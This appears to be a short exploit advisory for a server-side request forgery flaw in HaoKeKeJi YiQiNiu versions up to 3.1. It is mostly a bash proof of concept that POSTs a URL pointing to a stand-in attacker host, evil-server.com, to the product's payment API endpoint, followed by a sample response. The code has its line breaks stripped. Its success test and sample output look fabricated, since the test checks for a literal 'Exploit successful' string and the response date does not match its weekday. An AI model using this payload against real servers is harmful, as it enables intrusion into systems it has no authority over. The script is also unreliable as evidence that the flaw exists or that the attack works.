Headline
HaoKeKeJi YiQiNiu Server-Side Request Forgery
HaoKeKeJi YiQiNiu versions up to 3.1 suffer from a server-side request forgery vulnerability.
#!/bin/bash# Set target URL and payloadtarget_url="http://example.com/application/pay/controller/Api.php"payload="url=http://evil-server.com/exploit"# Send the malicious requestresponse=$(curl -s -X POST -d "$payload" "$target_url")# Check if the exploit was successfulif echo "$response" | grep -q "Exploit successful"; then echo "Exploit succeeded"else echo "Exploit failed"fi# Example payload and responsepayload="url=http://evil-server.com/exploit"response="HTTP/1.1 200 OKServer: nginx/1.14.0 (Ubuntu)Date: Mon, 01 Dec 2024 20:23:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 25Connection: keep-aliveExploit successful"